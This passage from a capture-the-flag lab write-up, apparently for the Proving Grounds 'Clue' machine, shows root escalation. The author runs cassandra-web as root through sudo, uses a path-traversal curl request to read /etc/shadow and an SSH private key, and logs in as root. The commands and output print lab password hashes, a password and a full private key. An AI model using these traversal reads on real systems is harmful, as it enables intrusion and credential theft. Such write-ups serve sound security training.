sudo privileges
The cassie user has sudo privileges to execute the /usr/local/bin/cassandra-web command as anyone without getting prompted for password. We have already established that the target’s cassandra-web instance is vulnerable to remote file read.
If I could start an instance as the root account, I should be able to read any file on the target system by leveraging the vulnerability.
cassie@clue:~$ sudo /usr/local/bin/cassandra-web -u cassie -p SecondBiteTheApple330 -B 0.0.0.0:30000
I, [2025-03-25T17:43:00.681498 #1883] INFO -- : Establishing control connection
I, [2025-03-25T17:43:00.759219 #1883] INFO -- : Refreshing connected host's metadata
I, [2025-03-25T17:43:00.762583 #1883] INFO -- : Completed refreshing connected host's metadata
I, [2025-03-25T17:43:00.763126 #1883] INFO -- : Refreshing peers metadata
I, [2025-03-25T17:43:00.764096 #1883] INFO -- : Completed refreshing peers metadata
I, [2025-03-25T17:43:00.764124 #1883] INFO -- : Refreshing schema
I, [2025-03-25T17:43:00.787663 #1883] INFO -- : Schema refreshed
I, [2025-03-25T17:43:00.787701 #1883] INFO -- : Control connection established
I, [2025-03-25T17:43:00.787874 #1883] INFO -- : Creating session
I, [2025-03-25T17:43:00.928542 #1883] INFO -- : Session created
2025-03-25 17:43:00 -0400 Thin web server (v1.8.1 codename Infinite Smoothie)
2025-03-25 17:43:00 -0400 Maximum connections set to 1024
2025-03-25 17:43:00 -0400 Listening on 0.0.0.0:30000, CTRL+C to stopIt seems to have worked
cassie@clue:~$ ps -auxww | grep -i cassandra-web
cassie 1845 0.2 1.4 621088 29552 ? Ssl 17:42 0:00 /usr/bin/ruby2.5 /usr/local/bin/cassandra-web -u cassie -p SecondBiteTheApple330
root 1882 0.0 0.1 10192 4064 pts/0 S<+ 17:43 0:00 sudo /usr/local/bin/cassandra-web -u cassie -p SecondBiteTheApple330 -B 0.0.0.0:30000
root 1883 0.3 1.4 382460 28824 pts/0 S<l+ 17:43 0:00 /usr/bin/ruby2.5 /usr/local/bin/cassandra-web -u cassie -p SecondBiteTheApple330 -B 0.0.0.0:30000It worked. Besides the original instance running on the port 3000, there is another instance running with privileges of the root account on the port 30000
From within
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ curl -I http://clue.pg:30000/However, I cannot reach the application due to the firewall
cassie@clue:~$ curl -I localhost:30000
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Content-Length: 3837
Vary: Origin
Connection: keep-alive
Server: thinBut I can reach it from within the target system
/etc/shadow
cassie@clue:~$ curl localhost:30000/../../../../../../../../../../etc/shadow --path-as-is
root:$6$kuXiAC8PIOY2uis9$LrTzlkYSlY485ZREBLW5iPSpNxamM38BL85BPmaIAWp05VlV.tdq0EryiFLbLryvbsGTx50dLnMsxIk7PJB5P1:19209:0:99999:7:::
daemon:*:18555:0:99999:7:::
bin:*:18555:0:99999:7:::
sys:*:18555:0:99999:7:::
sync:*:18555:0:99999:7:::
games:*:18555:0:99999:7:::
man:*:18555:0:99999:7:::
lp:*:18555:0:99999:7:::
mail:*:18555:0:99999:7:::
news:*:18555:0:99999:7:::
uucp:*:18555:0:99999:7:::
proxy:*:18555:0:99999:7:::
www-data:*:18555:0:99999:7:::
backup:*:18555:0:99999:7:::
list:*:18555:0:99999:7:::
irc:*:18555:0:99999:7:::
gnats:*:18555:0:99999:7:::
nobody:*:18555:0:99999:7:::
_apt:*:18555:0:99999:7:::
systemd-timesync:*:18555:0:99999:7:::
systemd-network:*:18555:0:99999:7:::
systemd-resolve:*:18555:0:99999:7:::
messagebus:*:18555:0:99999:7:::
sshd:*:18555:0:99999:7:::
systemd-coredump:!!:18555::::::
ntp:*:19209:0:99999:7:::
cassandra:!:19209:0:99999:7:::
cassie:$6$/WeFDwP1CNIN34/z$9woKSLSZhgHw1mX3ou90wnR.i5LHEfeyfHbxu7nYmaZILVrbhHrSeHNGqV0WesuQWGIL7DHEwHKOLK6UX79DI0:19209:0:99999:7:::
freeswitch:!:19209::::::
anthony:$6$01NV0gAhVLOnUHb0$byLv3N95fqVvhut9rbsrYOVzi8QseWfkFl7.VDQ.26a.0IkEVR2TDXoTv/KCMLjUOQZMMpkTUdC3WIyqSWQ.Y1:19209:0:99999:7:::Leveraging the vulnerability, I can read the /etc/shadow file
SSH Private Key
cassie@clue:~$ curl localhost:30000/../../../../../../../../../../root/.ssh/id_rsa --path-as-isUnfortunately, there is no SSH private key for the root account
cassie@clue:~$ curl localhost:30000/../../../../../../../../../../home/anthony/.ssh/id_rsa --path-as-is
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAw59iC+ySJ9F/xWp8QVkvBva2nCFikZ0VT7hkhtAxujRRqKjhLKJe
d19FBjwkeSg+PevKIzrBVr0JQuEPJ1C9NCxRsp91xECMK3hGh/DBdfh1FrQACtS4oOdzdM
jWyB00P1JPdEM4ojwzPu0CcduuV0kVJDndtsDqAcLJr+Ls8zYo376zCyJuCCBonPVitr2m
B6KWILv/ajKwbgrNMZpQb8prHL3lRIVabjaSv0bITx1KMeyaya+K+Dz84Vu8uHNFJO0rhq
gBAGtUgBJNJWa9EZtwws9PtsLIOzyZYrQTOTq4+q/FFpAKfbsNdqUe445FkvPmryyx7If/
DaMoSYSPhwAAA8gc9JxpHPScaQAAAAdzc2gtcnNhAAABAQDDn2IL7JIn0X/FanxBWS8G9r
acIWKRnRVPuGSG0DG6NFGoqOEsol53X0UGPCR5KD4968ojOsFWvQlC4Q8nUL00LFGyn3XE
QIwreEaH8MF1+HUWtAAK1Lig53N0yNbIHTQ/Uk90QziiPDM+7QJx265XSRUkOd22wOoBws
mv4uzzNijfvrMLIm4IIGic9WK2vaYHopYgu/9qMrBuCs0xmlBvymscveVEhVpuNpK/RshP
HUox7JrJr4r4PPzhW7y4c0Uk7SuGqAEAa1SAEk0lZr0Rm3DCz0+2wsg7PJlitBM5Orj6r8
UWkAp9uw12pR7jjkWS8+avLLHsh/8NoyhJhI+HAAAAAwEAAQAAAQBjswJsY1il9I7zFW9Y
etSN7wVok1dCMVXgOHD7iHYfmXSYyeFhNyuAGUz7fYF1Qj5enqJ5zAMnataigEOR3QNg6M
mGiOCjceY+bWE8/UYMEuHR/VEcNAgY8X0VYxqcCM5NC201KuFdReM0SeT6FGVJVRTyTo+i
CbX5ycWy36u109ncxnDrxJvvb7xROxQ/dCrusF2uVuejUtI4uX1eeqZy3Rb3GPVI4Ttq0+
0hu6jNH4YCYU3SGdwTDz/UJIh9/10OJYsuKcDPBlYwT7mw2QmES3IACPpW8KZAigSLM4fG
Y2Ej3uwX8g6pku6P6ecgwmE2jYPP4c/TMU7TLuSAT9TpAAAAgG46HP7WIX+Hjdjuxa2/2C
gX/VSpkzFcdARj51oG4bgXW33pkoXWHvt/iIz8ahHqZB4dniCjHVzjm2hiXwbUvvnKMrCG
krIAfZcUP7Ng/pb1wmqz14lNwuhj9WUhoVJFgYk14knZhC2v2dPdZ8BZ3dqBnfQl0IfR9b
yyQzy+CLBRAAAAgQD7g2V+1vlb8MEyIhQJsSxPGA8Ge05HJDKmaiwC2o+L3Er1dlktm/Ys
kBW5hWiVwWoeCUAmUcNgFHMFs5nIZnWBwUhgukrdGu3xXpipp9uyeYuuE0/jGob5SFHXvU
DEaXqE8Q9K14vb9by1RZaxWEMK6byndDNswtz9AeEwnCG0OwAAAIEAxxy/IMPfT3PUoknN
Q2N8D2WlFEYh0avw/VlqUiGTJE8K6lbzu6M0nxv+OI0i1BVR1zrd28BYphDOsAy6kZNBTU
iw4liAQFFhimnpld+7/8EBW1Oti8ZH5Mx8RdsxYtzBlC2uDyblKrG030Nk0EHNpcG6kRVj
4oGMJpv1aeQnWSUAAAAMYW50aG9ueUBjbHVlAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----But there is one for the anthony user
SSH
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ ssh anthony@$IP -i ./id_rsa.anthony
anthony@192.168.220.240's password: It doesn’t work. The SSH private key doesn’t belong to the anthony user
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ ssh root@$IP -i ./id_rsa.anthony
Linux clue 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 25 17:34:20 2025 from 192.168.45.192
root@clue:~# whoami
root
root@clue:~# hostname
clue
root@clue:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:c3:e4 brd ff:ff:ff:ff:ff:ff
inet 192.168.220.240/24 brd 192.168.220.255 scope global ens192
valid_lft forever preferred_lft foreverIt belonged to the root user
System level compromise